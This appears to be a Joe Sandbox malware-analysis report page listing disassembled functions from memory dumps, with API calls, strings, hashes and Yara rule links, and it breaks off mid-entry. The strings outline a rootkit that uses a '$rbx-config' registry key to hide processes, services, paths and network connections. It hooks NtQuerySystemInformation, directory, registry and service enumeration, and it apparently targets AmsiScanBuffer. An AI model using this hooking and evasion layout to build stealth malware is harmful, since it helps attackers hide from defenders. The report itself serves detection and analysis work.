Associated: 00000014.00000002.2565302689.000002527DEE0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2568003239.000002527DEF5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2569195844.000002527DF00000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2570458513.000002527DF02000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2571664744.000002527DF09000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2527dee0000_cmd.jbxd

Similarity

API ID: Heap$Process$Free
String ID:
API String ID: 3168794593-0
Opcode ID: 9443d602d0b049153862e9eaa237bd29413aa500a4ba3f93029a44f067b5ebe9
Instruction ID: d5465d8fceebc614196c05a2e9d299c296dfbd2f957bc60ba9a9d9a406bfc6a4
Opcode Fuzzy Hash: 9443d602d0b049153862e9eaa237bd29413aa500a4ba3f93029a44f067b5ebe9
Instruction Fuzzy Hash: B9E01A62600E84D7EB59CB67EC48159E7A1FB9EFC2F098034DA0947394FE38D2998704

Function 000002527DEED894 Relevance: 1.7, APIs: 1, Instructions: 234COMMON

Download Yara Rule

APIs

Part of subcall function 000002527DEED220: HeapAlloc.KERNEL32(?,?,00000000,000002527DEEC987), ref: 000002527DEED275

Part of subcall function 000002527DEF0EB8: _invalid_parameter_noinfo.LIBCMT ref: 000002527DEF0EEB

FindFirstFileExW.KERNEL32 ref: 000002527DEEDB99

Part of subcall function 000002527DEED2A0: HeapFree.KERNEL32(?,?,?,?,?,?,?,000002527DEE674A), ref: 000002527DEED2B6
Part of subcall function 000002527DEED2A0: GetLastError.KERNEL32(?,?,?,?,?,?,?,000002527DEE674A), ref: 000002527DEED2C0

Memory Dump Source

Source File: 00000014.00000002.2566578597.000002527DEE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DEE0000, based on PE: true

Associated: 00000014.00000002.2565302689.000002527DEE0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2568003239.000002527DEF5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2569195844.000002527DF00000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2570458513.000002527DF02000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2571664744.000002527DF09000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2527dee0000_cmd.jbxd

Similarity

API ID: Heap$AllocErrorFileFindFirstFreeLast_invalid_parameter_noinfo
String ID:
API String ID: 2436724071-0
Opcode ID: 015d5b419df91353723227b82cc5f20b2d7cfca631414c8aa69de49a3ee2378e
Instruction ID: c07f9a585ac843c6921433f0fdea2d297c21bfaddc27d7bcd2e7a4727e6328e2
Opcode Fuzzy Hash: 015d5b419df91353723227b82cc5f20b2d7cfca631414c8aa69de49a3ee2378e
Instruction Fuzzy Hash: D681C522304E80C7FB22DB72ED483AEF791E78A7A5F4C4225AE9D177D5DA38C1458708

Function 000002527DF1D894 Relevance: 1.7, APIs: 1, Instructions: 234COMMON

Download Yara Rule

APIs

Part of subcall function 000002527DF1D220: HeapAlloc.KERNEL32(?,?,00000000,000002527DF1C987), ref: 000002527DF1D275

Part of subcall function 000002527DF20EB8: _invalid_parameter_noinfo.LIBCMT ref: 000002527DF20EEB

FindFirstFileExW.KERNEL32 ref: 000002527DF1DB99

Part of subcall function 000002527DF1D2A0: HeapFree.KERNEL32(?,?,?,?,?,?,?,000002527DF1674A), ref: 000002527DF1D2B6
Part of subcall function 000002527DF1D2A0: GetLastError.KERNEL32(?,?,?,?,?,?,?,000002527DF1674A), ref: 000002527DF1D2C0

Memory Dump Source

Source File: 00000014.00000002.2573660018.000002527DF11000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DF10000, based on PE: true

Associated: 00000014.00000002.2572815512.000002527DF10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2574698088.000002527DF25000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2575545537.000002527DF30000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2576428438.000002527DF32000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2577258999.000002527DF39000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2527df10000_cmd.jbxd

Similarity

API ID: Heap$AllocErrorFileFindFirstFreeLast_invalid_parameter_noinfo
String ID:
API String ID: 2436724071-0
Opcode ID: 015d5b419df91353723227b82cc5f20b2d7cfca631414c8aa69de49a3ee2378e
Instruction ID: b7117592f5ab76d0c94a240fa47c4acfae9d0b609d8af51fe51564967c74c9dd
Opcode Fuzzy Hash: 015d5b419df91353723227b82cc5f20b2d7cfca631414c8aa69de49a3ee2378e
Instruction Fuzzy Hash: 7681D822304E80C5EB24DB61AD5835EE7B1E78A7E5F484116EEBD07BD5DE39C0498709

Function 000002527DEB23F0 Relevance: .3, Instructions: 256COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000003.2189620345.000002527DEB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002527DEB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_3_2527deb0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
Instruction ID: 4af79898feb1b93dacd28f62de339da56f7d2ef3977a866294e83a36f287c84d
Opcode Fuzzy Hash: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
Instruction Fuzzy Hash: 04B1AE22211AD0C7EB5BDF25D818B99F3E4FB4AB86F505016DE49537D8DA34EC48C348

Function 000002527DEBCE18 Relevance: .2, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000003.2189620345.000002527DEB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002527DEB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_3_2527deb0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f4f0e9bd47f1bfdedf4b775ca86e3d575203b640b2156497393b07ceb78223e
Instruction ID: 7e3d3278614c9bfdb103acc3d9d4766a690968ba0164609aa050c2b9a89c7f49
Opcode Fuzzy Hash: 9f4f0e9bd47f1bfdedf4b775ca86e3d575203b640b2156497393b07ceb78223e
Instruction Fuzzy Hash: 2FA12C22704E80CBFB22DB759C48BADFBE1E34BB95F185015DE99276D5CA34D48AC708

Function 000002527DEBCC94 Relevance: .2, Instructions: 234COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000003.2189620345.000002527DEB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002527DEB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_3_2527deb0000_cmd.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 62e993fff46357151edcc5153368e15278213980a8013bd1398bff7cc139778e
Instruction ID: fa49b1d64962245c50ffc34b9268f9be7672074ab2a713e7e1a9fd69c8d21e2e
Opcode Fuzzy Hash: 62e993fff46357151edcc5153368e15278213980a8013bd1398bff7cc139778e
Instruction Fuzzy Hash: 0981C832308E40C7EB26DF32AC48B6EEBD1E78AB95F444525AE99177D5DE38D0858708

Function 000002527DEC2AF0 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000003.2189620345.000002527DEB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002527DEB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_3_2527deb0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9bdd77244afecc035c9c3357dde6af93eede52a42cb897eb52dd6107e5c9c51
Instruction ID: 58356ce80f55609ff6ea5191101c2d0737016c4064a0c7190fa1ec3818f18161
Opcode Fuzzy Hash: c9bdd77244afecc035c9c3357dde6af93eede52a42cb897eb52dd6107e5c9c51
Instruction Fuzzy Hash: 071165B1615990CBF7ABDF39AC5931DB790E30E386F448429D44D86AD8C73DC4948F18

Function 000002527DEE1724 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157
registrymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 000002527DEE172F
HeapAlloc.KERNEL32 ref: 000002527DEE173E

Part of subcall function 000002527DEE1264: GetProcessHeap.KERNEL32 ref: 000002527DEE126A
Part of subcall function 000002527DEE1264: HeapAlloc.KERNEL32 ref: 000002527DEE1279
Part of subcall function 000002527DEE1264: GetProcessHeap.KERNEL32 ref: 000002527DEE1293
Part of subcall function 000002527DEE1264: HeapAlloc.KERNEL32 ref: 000002527DEE12A4

Part of subcall function 000002527DEE1000: GetProcessHeap.KERNEL32 ref: 000002527DEE1006
Part of subcall function 000002527DEE1000: HeapAlloc.KERNEL32 ref: 000002527DEE1015
Part of subcall function 000002527DEE1000: GetProcessHeap.KERNEL32 ref: 000002527DEE1028
Part of subcall function 000002527DEE1000: HeapAlloc.KERNEL32 ref: 000002527DEE1037

RegOpenKeyExW.ADVAPI32 ref: 000002527DEE17AE
RegOpenKeyExW.ADVAPI32 ref: 000002527DEE17DB
RegCloseKey.ADVAPI32 ref: 000002527DEE17F5
RegOpenKeyExW.ADVAPI32 ref: 000002527DEE1815
RegCloseKey.ADVAPI32 ref: 000002527DEE1830
RegOpenKeyExW.ADVAPI32 ref: 000002527DEE1850
RegCloseKey.ADVAPI32 ref: 000002527DEE186B
RegOpenKeyExW.ADVAPI32 ref: 000002527DEE188B
RegCloseKey.ADVAPI32 ref: 000002527DEE18A6
RegOpenKeyExW.ADVAPI32 ref: 000002527DEE18C6
RegCloseKey.ADVAPI32 ref: 000002527DEE18E1
RegOpenKeyExW.ADVAPI32 ref: 000002527DEE1901
RegCloseKey.ADVAPI32 ref: 000002527DEE191C
RegOpenKeyExW.ADVAPI32 ref: 000002527DEE193C
RegCloseKey.ADVAPI32 ref: 000002527DEE1957
RegOpenKeyExW.ADVAPI32 ref: 000002527DEE1977
RegCloseKey.ADVAPI32 ref: 000002527DEE1992
RegCloseKey.ADVAPI32 ref: 000002527DEE199C

Part of subcall function 000002527DEE12B8: RegQueryInfoKeyW.ADVAPI32 ref: 000002527DEE1315
Part of subcall function 000002527DEE12B8: GetProcessHeap.KERNEL32 ref: 000002527DEE1323
Part of subcall function 000002527DEE12B8: HeapAlloc.KERNEL32 ref: 000002527DEE1334
Part of subcall function 000002527DEE12B8: RegEnumValueW.ADVAPI32 ref: 000002527DEE1393
Part of subcall function 000002527DEE12B8: GetProcessHeap.KERNEL32 ref: 000002527DEE13DB
Part of subcall function 000002527DEE12B8: HeapAlloc.KERNEL32 ref: 000002527DEE13E9
Part of subcall function 000002527DEE12B8: GetProcessHeap.KERNEL32 ref: 000002527DEE1406
Part of subcall function 000002527DEE12B8: HeapFree.KERNEL32 ref: 000002527DEE1414
Part of subcall function 000002527DEE12B8: lstrlenW.KERNEL32 ref: 000002527DEE141D
Part of subcall function 000002527DEE12B8: GetProcessHeap.KERNEL32 ref: 000002527DEE142B
Part of subcall function 000002527DEE12B8: HeapAlloc.KERNEL32 ref: 000002527DEE1439

Strings

tcp_remote, xrefs: 000002527DEE1935
tcp_local, xrefs: 000002527DEE18FA
paths, xrefs: 000002527DEE1884
startup, xrefs: 000002527DEE17D1
service_names, xrefs: 000002527DEE18BF
pid, xrefs: 000002527DEE180E
SOFTWARE\$rbx-config, xrefs: 000002527DEE178E
udp, xrefs: 000002527DEE1970
process_names, xrefs: 000002527DEE1849

Memory Dump Source

Source File: 00000014.00000002.2566578597.000002527DEE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DEE0000, based on PE: true

Associated: 00000014.00000002.2565302689.000002527DEE0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2568003239.000002527DEF5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2569195844.000002527DF00000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2570458513.000002527DF02000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2571664744.000002527DF09000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2527dee0000_cmd.jbxd

Similarity

API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
String ID: SOFTWARE\$rbx-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
API String ID: 2135414181-3414887735
Opcode ID: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
Instruction ID: c0ef9440ac4a20cc3c9d50514f99da7a9e95b74d68c9fde32309cd6cece48c34
Opcode Fuzzy Hash: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
Instruction Fuzzy Hash: 30712826210F50C6EB51DF71EC9869CA3A5FB9EB8AF401111DE4D43BE8DE38C588C358

Function 000002527DF11724 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157
registrymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 000002527DF1172F
HeapAlloc.KERNEL32 ref: 000002527DF1173E

Part of subcall function 000002527DF11264: GetProcessHeap.KERNEL32 ref: 000002527DF1126A
Part of subcall function 000002527DF11264: HeapAlloc.KERNEL32 ref: 000002527DF11279
Part of subcall function 000002527DF11264: GetProcessHeap.KERNEL32 ref: 000002527DF11293
Part of subcall function 000002527DF11264: HeapAlloc.KERNEL32 ref: 000002527DF112A4

Part of subcall function 000002527DF11000: GetProcessHeap.KERNEL32 ref: 000002527DF11006
Part of subcall function 000002527DF11000: HeapAlloc.KERNEL32 ref: 000002527DF11015
Part of subcall function 000002527DF11000: GetProcessHeap.KERNEL32 ref: 000002527DF11028
Part of subcall function 000002527DF11000: HeapAlloc.KERNEL32 ref: 000002527DF11037

RegOpenKeyExW.ADVAPI32 ref: 000002527DF117AE
RegOpenKeyExW.ADVAPI32 ref: 000002527DF117DB
RegCloseKey.ADVAPI32 ref: 000002527DF117F5
RegOpenKeyExW.ADVAPI32 ref: 000002527DF11815
RegCloseKey.ADVAPI32 ref: 000002527DF11830
RegOpenKeyExW.ADVAPI32 ref: 000002527DF11850
RegCloseKey.ADVAPI32 ref: 000002527DF1186B
RegOpenKeyExW.ADVAPI32 ref: 000002527DF1188B
RegCloseKey.ADVAPI32 ref: 000002527DF118A6
RegOpenKeyExW.ADVAPI32 ref: 000002527DF118C6
RegCloseKey.ADVAPI32 ref: 000002527DF118E1
RegOpenKeyExW.ADVAPI32 ref: 000002527DF11901
RegCloseKey.ADVAPI32 ref: 000002527DF1191C
RegOpenKeyExW.ADVAPI32 ref: 000002527DF1193C
RegCloseKey.ADVAPI32 ref: 000002527DF11957
RegOpenKeyExW.ADVAPI32 ref: 000002527DF11977
RegCloseKey.ADVAPI32 ref: 000002527DF11992
RegCloseKey.ADVAPI32 ref: 000002527DF1199C

Part of subcall function 000002527DF112B8: RegQueryInfoKeyW.ADVAPI32 ref: 000002527DF11315
Part of subcall function 000002527DF112B8: GetProcessHeap.KERNEL32 ref: 000002527DF11323
Part of subcall function 000002527DF112B8: HeapAlloc.KERNEL32 ref: 000002527DF11334
Part of subcall function 000002527DF112B8: RegEnumValueW.ADVAPI32 ref: 000002527DF11393
Part of subcall function 000002527DF112B8: GetProcessHeap.KERNEL32 ref: 000002527DF113DB
Part of subcall function 000002527DF112B8: HeapAlloc.KERNEL32 ref: 000002527DF113E9
Part of subcall function 000002527DF112B8: GetProcessHeap.KERNEL32 ref: 000002527DF11406
Part of subcall function 000002527DF112B8: HeapFree.KERNEL32 ref: 000002527DF11414
Part of subcall function 000002527DF112B8: lstrlenW.KERNEL32 ref: 000002527DF1141D
Part of subcall function 000002527DF112B8: GetProcessHeap.KERNEL32 ref: 000002527DF1142B
Part of subcall function 000002527DF112B8: HeapAlloc.KERNEL32 ref: 000002527DF11439

Strings

SOFTWARE\$rbx-config, xrefs: 000002527DF1178E
process_names, xrefs: 000002527DF11849
startup, xrefs: 000002527DF117D1
tcp_remote, xrefs: 000002527DF11935
tcp_local, xrefs: 000002527DF118FA
pid, xrefs: 000002527DF1180E
udp, xrefs: 000002527DF11970
service_names, xrefs: 000002527DF118BF
paths, xrefs: 000002527DF11884

Memory Dump Source

Source File: 00000014.00000002.2573660018.000002527DF11000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DF10000, based on PE: true

Associated: 00000014.00000002.2572815512.000002527DF10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2574698088.000002527DF25000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2575545537.000002527DF30000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2576428438.000002527DF32000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2577258999.000002527DF39000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2527df10000_cmd.jbxd

Similarity

API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
String ID: SOFTWARE\$rbx-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
API String ID: 2135414181-3414887735
Opcode ID: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
Instruction ID: 9f3f21ac42aed9d24c02f805a3c319f8f73e7bf5ac037e2da922d0293fc6c475
Opcode Fuzzy Hash: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
Instruction Fuzzy Hash: DE712936610E51C5EB20DF21EC5879EA3A4FB8AB8AF445111DE6D47BE8DE39C44CC389

Function 000002527DF11E74 Relevance: 43.8, APIs: 8, Strings: 17, Instructions: 95
memorythreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThread.KERNEL32 ref: 000002527DF11E7F

Part of subcall function 000002527DF122A8: GetModuleHandleA.KERNEL32(?,?,?,000002527DF11EB1), ref: 000002527DF122C0
Part of subcall function 000002527DF122A8: GetProcAddress.KERNEL32(?,?,?,000002527DF11EB1), ref: 000002527DF122D1

CreateThread.KERNEL32 ref: 000002527DF12043
TlsAlloc.KERNEL32 ref: 000002527DF12049
TlsAlloc.KERNEL32 ref: 000002527DF12055
TlsAlloc.KERNEL32 ref: 000002527DF12061
TlsAlloc.KERNEL32 ref: 000002527DF1206D
TlsAlloc.KERNEL32 ref: 000002527DF12079
TlsAlloc.KERNEL32 ref: 000002527DF12085

Strings

NtResumeThread, xrefs: 000002527DF11EC2
PdhGetRawCounterArrayW, xrefs: 000002527DF11FD0
sechost.dll, xrefs: 000002527DF11F99
NtQuerySystemInformation, xrefs: 000002527DF11EA5
advapi32.dll, xrefs: 000002527DF11F57, 000002527DF11F78
AmsiScanBuffer, xrefs: 000002527DF12012
NtQueryDirectoryFile, xrefs: 000002527DF11EDF
EnumServicesStatusExW, xrefs: 000002527DF11F71, 000002527DF11F92
NtEnumerateValueKey, xrefs: 000002527DF11F36
PdhGetFormattedCounterArrayW, xrefs: 000002527DF11FF1
pdh.dll, xrefs: 000002527DF11FD7, 000002527DF11FF8
NtDeviceIoControlFile, xrefs: 000002527DF11FB6
EnumServiceGroupW, xrefs: 000002527DF11F50
NtEnumerateKey, xrefs: 000002527DF11F19
ntdll.dll, xrefs: 000002527DF11E8D
amsi.dll, xrefs: 000002527DF12019
NtQueryDirectoryFileEx, xrefs: 000002527DF11EFC

Memory Dump Source

Source File: 00000014.00000002.2573660018.000002527DF11000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DF10000, based on PE: true

Associated: 00000014.00000002.2572815512.000002527DF10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2574698088.000002527DF25000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2575545537.000002527DF30000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2576428438.000002527DF32000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2577258999.000002527DF39000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2527df10000_cmd.jbxd

Similarity

API ID: Alloc$Thread$AddressCreateCurrentHandleModuleProc
String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
API String ID: 1735320900-4225371247
Opcode ID: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
Instruction ID: 68607c258b3b756c840ced296594d84ce23c67e02429b6bb4dcca1cb9a3c0264
Opcode Fuzzy Hash: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
Instruction Fuzzy Hash: 03519E60110E8AE6FB00DFA9EC4E7D9A320F74E796F804513D829025E5DE7D925EC39B

Function 000002527DEE12B8 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120
memoryregistrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 000002527DEE1315
GetProcessHeap.KERNEL32 ref: 000002527DEE1323
HeapAlloc.KERNEL32 ref: 000002527DEE1334
RegEnumValueW.ADVAPI32 ref: 000002527DEE1393

Part of subcall function 000002527DEE1530: StrCmpIW.SHLWAPI ref: 000002527DEE1561

GetProcessHeap.KERNEL32 ref: 000002527DEE13DB
HeapAlloc.KERNEL32 ref: 000002527DEE13E9
GetProcessHeap.KERNEL32 ref: 000002527DEE1406
HeapFree.KERNEL32 ref: 000002527DEE1414
lstrlenW.KERNEL32 ref: 000002527DEE141D
GetProcessHeap.KERNEL32 ref: 000002527DEE142B
HeapAlloc.KERNEL32 ref: 000002527DEE1439
StrCpyW.SHLWAPI ref: 000002527DEE145B
GetProcessHeap.KERNEL32 ref: 000002527DEE1472
HeapFree.KERNEL32 ref: 000002527DEE1480

Strings

d, xrefs: 000002527DEE1356

Memory Dump Source

Source File: 00000014.00000002.2566578597.000002527DEE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DEE0000, based on PE: true

Associated: 00000014.00000002.2565302689.000002527DEE0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2568003239.000002527DEF5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2569195844.000002527DF00000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2570458513.000002527DF02000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2571664744.000002527DF09000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2527dee0000_cmd.jbxd

Similarity

API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
String ID: d
API String ID: 2005889112-2564639436
Opcode ID: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
Instruction ID: 838cd6f29ce7e40f84a4ab4f924f8ac258e3841ab7bba4a872a7197607d2f7dd
Opcode Fuzzy Hash: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
Instruction Fuzzy Hash: C5514972210F84DBE765CF62E84835AB7A1F79AF9AF444124DE4907798EF3CD2498704

Function 000002527DF112B8 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120
memoryregistrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 000002527DF11315
GetProcessHeap.KERNEL32 ref: 000002527DF11323
HeapAlloc.KERNEL32 ref: 000002527DF11334
RegEnumValueW.ADVAPI32 ref: 000002527DF11393

Part of subcall function 000002527DF11530: StrCmpIW.SHLWAPI ref: 000002527DF11561

GetProcessHeap.KERNEL32 ref: 000002527DF113DB
HeapAlloc.KERNEL32 ref: 000002527DF113E9
GetProcessHeap.KERNEL32 ref: 000002527DF11406
HeapFree.KERNEL32 ref: 000002527DF11414
lstrlenW.KERNEL32 ref: 000002527DF1141D
GetProcessHeap.KERNEL32 ref: 000002527DF1142B
HeapAlloc.KERNEL32 ref: 000002527DF11439
StrCpyW.SHLWAPI ref: 000002527DF1145B
GetProcessHeap.KERNEL32 ref: 000002527DF11472
HeapFree.KERNEL32 ref: 000002527DF11480

Strings

d, xrefs: 000002527DF11356

Memory Dump Source

Source File: 00000014.00000002.2573660018.000002527DF11000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DF10000, based on PE: true

Associated: 00000014.00000002.2572815512.000002527DF10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2574698088.000002527DF25000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2575545537.000002527DF30000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2576428438.000002527DF32000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2577258999.000002527DF39000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2527df10000_cmd.jbxd

Similarity

API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
String ID: d
API String ID: 2005889112-2564639436
Opcode ID: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
Instruction ID: 73533d43430c2d14b3d8dbb7f21781bc5881ebdb20f8ca614db78c8ba4196ba8
Opcode Fuzzy Hash: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
Instruction Fuzzy Hash: C4514A32210F84DAEB24CF62E84936AB7A1F78AF9AF444124DE5907798DF3CD149C745

Function 000002527DEEEF88 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 140
librarymemoryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNEL32(?,00000100,00000000,000002527DEEF34A,?,?,00000000,000002527DEEF2CD), ref: 000002527DEEEFF5
GetLastError.KERNEL32(?,?,00000000,000002527DEEF2CD), ref: 000002527DEEF007
LoadLibraryExW.KERNEL32(?,?,00000000,000002527DEEF2CD), ref: 000002527DEEF049
VirtualProtect.KERNEL32 ref: 000002527DEEF0A5
VirtualProtect.KERNEL32 ref: 000002527DEEF0D6
FreeLibrary.KERNEL32(?,?,00000000,000002527DEEF2CD), ref: 000002527DEEF11A
GetProcAddress.KERNEL32(?,?,00000000,000002527DEEF2CD), ref: 000002527DEEF126

Strings

AppPolicyGetProcessTerminationMethod, xrefs: 000002527DEEF157, 000002527DEEF165
api-ms-, xrefs: 000002527DEEF01B
ext-ms-, xrefs: 000002527DEEF02E

Memory Dump Source

Source File: 00000014.00000002.2566578597.000002527DEE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DEE0000, based on PE: true

Associated: 00000014.00000002.2565302689.000002527DEE0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2568003239.000002527DEF5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2569195844.000002527DF00000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2570458513.000002527DF02000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2571664744.000002527DF09000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2527dee0000_cmd.jbxd

Similarity

API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
API String ID: 740688525-1880043860
Opcode ID: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
Instruction ID: 137d80768644319c4a49c6ccdccd2821c15b78749ba22884419e0dda4a8d3a4a
Opcode Fuzzy Hash: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
Instruction Fuzzy Hash: B951BF21701F04D2FA56DB66AC083A9A260EB4FBB2F8807259E39473C5EF38D549C648

Function 000002527DF1EF88 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 140
librarymemoryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNEL32(?,00000100,00000000,000002527DF1F34A,?,?,00000000,000002527DF1F2CD), ref: 000002527DF1EFF5
GetLastError.KERNEL32(?,?,00000000,000002527DF1F2CD), ref: 000002527DF1F007
LoadLibraryExW.KERNEL32(?,?,00000000,000002527DF1F2CD), ref: 000002527DF1F049
VirtualProtect.KERNEL32 ref: 000002527DF1F0A5
VirtualProtect.KERNEL32 ref: 000002527DF1F0D6
FreeLibrary.KERNEL32(?,?,00000000,000002527DF1F2CD), ref: 000002527DF1F11A
GetProcAddress.KERNEL32(?,?,00000000,000002527DF1F2CD), ref: 000002527DF1F126

Strings

AppPolicyGetProcessTerminationMethod, xrefs: 000002527DF1F157, 000002527DF1F165
